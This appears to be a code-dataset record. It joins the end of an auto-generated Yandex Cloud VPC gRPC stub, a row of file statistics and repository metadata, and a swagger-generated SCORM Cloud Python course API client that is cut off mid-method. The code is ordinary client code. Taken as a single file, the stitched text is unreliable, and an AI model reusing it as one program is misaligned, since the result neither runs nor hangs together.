@staticmethod
def UpdateRules(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRules',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateRule(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRule',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Delete',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Move(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Move',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/ListOperations',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 53.48503 | 160 | 0.710311 | 1,795 | 17,864 | 6.578273 | 0.067967 | 0.043445 | 0.067581 | 0.082063 | 0.918699 | 0.91565 | 0.904387 | 0.875423 | 0.827236 | 0.810722 | 0 | 0.008591 | 0.224642 | 17,864 | 333 | 161 | 53.645646 | 0.84391 | 0.050381 | 0 | 0.570423 | 1 | 0 | 0.083121 | 0.054782 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070423 | false | 0 | 0.014085 | 0.03169 | 0.126761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cfd999fc4df20d1f133f7a5469281da9f9a4f4f3 | 199,140 | py | Python | rustici_software_cloud_v2/api/course_api.py | RusticiSoftware/scormcloud-api-v2-client-python | 04e2cce304a336caf492c3330c706840815c4abe | [
"Apache-2.0"
] | 2 | 2020-07-21T10:33:39.000Z | 2021-08-17T21:40:13.000Z | rustici_software_cloud_v2/api/course_api.py | RusticiSoftware/scormcloud-api-v2-client-python | 04e2cce304a336caf492c3330c706840815c4abe | [
"Apache-2.0"
] | 2 | 2020-10-22T20:58:19.000Z | 2020-10-27T17:25:28.000Z | rustici_software_cloud_v2/api/course_api.py | RusticiSoftware/scormcloud-api-v2-client-python | 04e2cce304a336caf492c3330c706840815c4abe | [
"Apache-2.0"
] | 1 | 2020-10-15T17:11:15.000Z | 2020-10-15T17:11:15.000Z | # coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: systems@rusticisoftware.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from rustici_software_cloud_v2.api_client import ApiClient
class CourseApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def build_course_preview_launch_link(self, course_id, launch_link_request, **kwargs): # noqa: E501
"""Get a launch link to preview a Course # noqa: E501
Returns the launch link to use to preview the course. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.build_course_preview_launch_link(course_id, launch_link_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param LaunchLinkRequestSchema launch_link_request: (required)
:return: LaunchLinkSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, **kwargs) # noqa: E501
else:
(data) = self.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, **kwargs) # noqa: E501
return data
def build_course_preview_launch_link_with_http_info(self, course_id, launch_link_request, **kwargs): # noqa: E501
"""Get a launch link to preview a Course # noqa: E501
Returns the launch link to use to preview the course. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param LaunchLinkRequestSchema launch_link_request: (required)
:return: LaunchLinkSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'launch_link_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method build_course_preview_launch_link" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `build_course_preview_launch_link`") # noqa: E501
# verify the required parameter 'launch_link_request' is set
if ('launch_link_request' not in params or
params['launch_link_request'] is None):
raise ValueError("Missing the required parameter `launch_link_request` when calling `build_course_preview_launch_link`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'launch_link_request' in params:
body_params = params['launch_link_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/preview', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LaunchLinkSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def build_course_preview_launch_link_with_version(self, course_id, version_id, launch_link_request, **kwargs): # noqa: E501
"""Get a launch link to preview a Course Version # noqa: E501
Returns the launch link to use to preview the course version. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.build_course_preview_launch_link_with_version(course_id, version_id, launch_link_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param LaunchLinkRequestSchema launch_link_request: (required)
:return: LaunchLinkSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, **kwargs) # noqa: E501
else:
(data) = self.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, **kwargs) # noqa: E501
return data
def build_course_preview_launch_link_with_version_with_http_info(self, course_id, version_id, launch_link_request, **kwargs): # noqa: E501
"""Get a launch link to preview a Course Version # noqa: E501
Returns the launch link to use to preview the course version. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param LaunchLinkRequestSchema launch_link_request: (required)
:return: LaunchLinkSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'launch_link_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method build_course_preview_launch_link_with_version" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `build_course_preview_launch_link_with_version`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `build_course_preview_launch_link_with_version`") # noqa: E501
# verify the required parameter 'launch_link_request' is set
if ('launch_link_request' not in params or
params['launch_link_request'] is None):
raise ValueError("Missing the required parameter `launch_link_request` when calling `build_course_preview_launch_link_with_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'launch_link_request' in params:
body_params = params['launch_link_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/preview', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LaunchLinkSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_fetch_and_import_course_job(self, course_id, import_request, **kwargs): # noqa: E501
"""Create a Course from a package fetched from an external source # noqa: E501
Creates a course from a package fetched and imported from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_fetch_and_import_course_job(course_id, import_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param ImportFetchRequestSchema import_request: (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_fetch_and_import_course_job_with_http_info(course_id, import_request, **kwargs) # noqa: E501
else:
(data) = self.create_fetch_and_import_course_job_with_http_info(course_id, import_request, **kwargs) # noqa: E501
return data
def create_fetch_and_import_course_job_with_http_info(self, course_id, import_request, **kwargs): # noqa: E501
"""Create a Course from a package fetched from an external source # noqa: E501
Creates a course from a package fetched and imported from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_fetch_and_import_course_job_with_http_info(course_id, import_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param ImportFetchRequestSchema import_request: (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'import_request', 'may_create_new_version', 'postback_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_fetch_and_import_course_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `create_fetch_and_import_course_job`") # noqa: E501
# verify the required parameter 'import_request' is set
if ('import_request' not in params or
params['import_request'] is None):
raise ValueError("Missing the required parameter `import_request` when calling `create_fetch_and_import_course_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'course_id' in params:
query_params.append(('courseId', params['course_id'])) # noqa: E501
if 'may_create_new_version' in params:
query_params.append(('mayCreateNewVersion', params['may_create_new_version'])) # noqa: E501
if 'postback_url' in params:
query_params.append(('postbackUrl', params['postback_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'import_request' in params:
body_params = params['import_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/importJobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringResultSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_no_upload_and_import_course_job(self, course_id, import_request, **kwargs): # noqa: E501
"""Create a Course from a fetched or referenced external media file # noqa: E501
Creates a course from one of two methods, fetchRequest or mediaFileReferenceRequest. In either case, an import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. - A fetchRequest performs the same actions as CreateFetchAndImportCourseJob. A course will be created from a package fetched from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. - A mediaFileReferenceRequest will not store the file in SCORM Cloud. Instead it will reference the media file at the time the learner needs to view the file from the provided url. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. >**Info:** >Unless working with media files, it is typical to use one of the other two import methods. >- CreateUploadAndImportCourseJob would be used if the course is in your local file system. >- CreateFetchAndImportCourseJob would be better suited for situations where the course is uploaded remotely but is accessible via a public url. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_no_upload_and_import_course_job(course_id, import_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param ImportRequestSchema import_request: (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, **kwargs) # noqa: E501
else:
(data) = self.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, **kwargs) # noqa: E501
return data
def create_no_upload_and_import_course_job_with_http_info(self, course_id, import_request, **kwargs): # noqa: E501
"""Create a Course from a fetched or referenced external media file # noqa: E501
Creates a course from one of two methods, fetchRequest or mediaFileReferenceRequest. In either case, an import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. - A fetchRequest performs the same actions as CreateFetchAndImportCourseJob. A course will be created from a package fetched from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. - A mediaFileReferenceRequest will not store the file in SCORM Cloud. Instead it will reference the media file at the time the learner needs to view the file from the provided url. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. >**Info:** >Unless working with media files, it is typical to use one of the other two import methods. >- CreateUploadAndImportCourseJob would be used if the course is in your local file system. >- CreateFetchAndImportCourseJob would be better suited for situations where the course is uploaded remotely but is accessible via a public url. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param ImportRequestSchema import_request: (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'import_request', 'may_create_new_version', 'postback_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_no_upload_and_import_course_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `create_no_upload_and_import_course_job`") # noqa: E501
# verify the required parameter 'import_request' is set
if ('import_request' not in params or
params['import_request'] is None):
raise ValueError("Missing the required parameter `import_request` when calling `create_no_upload_and_import_course_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'course_id' in params:
query_params.append(('courseId', params['course_id'])) # noqa: E501
if 'may_create_new_version' in params:
query_params.append(('mayCreateNewVersion', params['may_create_new_version'])) # noqa: E501
if 'postback_url' in params:
query_params.append(('postbackUrl', params['postback_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'import_request' in params:
body_params = params['import_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/importJobs/noUpload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringResultSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_upload_and_import_course_job(self, course_id, **kwargs): # noqa: E501
"""Create a Course from an uploaded package # noqa: E501
Creates a course from a package uploaded from your file system. The package will be sent as part of the request and will be stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_upload_and_import_course_job(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:param str uploaded_content_type: The MIME type identifier for the content to be uploaded. This is required if uploading a media file (.pdf, .mp3, or .mp4).
:param str content_metadata: Serialized 'mediaFileMetadata' schema.
:param file file: The zip file of the course contents to import.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_upload_and_import_course_job_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.create_upload_and_import_course_job_with_http_info(course_id, **kwargs) # noqa: E501
return data
def create_upload_and_import_course_job_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Create a Course from an uploaded package # noqa: E501
Creates a course from a package uploaded from your file system. The package will be sent as part of the request and will be stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus are only valid for one week after the course import finishes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_upload_and_import_course_job_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
:param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
:param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
:param str uploaded_content_type: The MIME type identifier for the content to be uploaded. This is required if uploading a media file (.pdf, .mp3, or .mp4).
:param str content_metadata: Serialized 'mediaFileMetadata' schema.
:param file file: The zip file of the course contents to import.
:return: StringResultSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'may_create_new_version', 'postback_url', 'uploaded_content_type', 'content_metadata', 'file'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_upload_and_import_course_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `create_upload_and_import_course_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'course_id' in params:
query_params.append(('courseId', params['course_id'])) # noqa: E501
if 'may_create_new_version' in params:
query_params.append(('mayCreateNewVersion', params['may_create_new_version'])) # noqa: E501
if 'postback_url' in params:
query_params.append(('postbackUrl', params['postback_url'])) # noqa: E501
header_params = {}
if 'uploaded_content_type' in params:
header_params['uploadedContentType'] = params['uploaded_content_type'] # noqa: E501
form_params = []
local_var_files = {}
if 'content_metadata' in params:
form_params.append(('contentMetadata', params['content_metadata'])) # noqa: E501
if 'file' in params:
local_var_files['file'] = params['file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/importJobs/upload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringResultSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course(self, course_id, **kwargs): # noqa: E501
"""Delete a Course # noqa: E501
Deletes the specified course. >**Caution:** >When a course is deleted, so is everything connected to the course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.delete_course_with_http_info(course_id, **kwargs) # noqa: E501
return data
def delete_course_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Delete a Course # noqa: E501
Deletes the specified course. >**Caution:** >When a course is deleted, so is everything connected to the course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_asset(self, course_id, relative_path, **kwargs): # noqa: E501
"""Delete an asset file from a Course # noqa: E501
Deletes the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseAssetFile or UploadCourseAssetFile endpoints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_asset(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
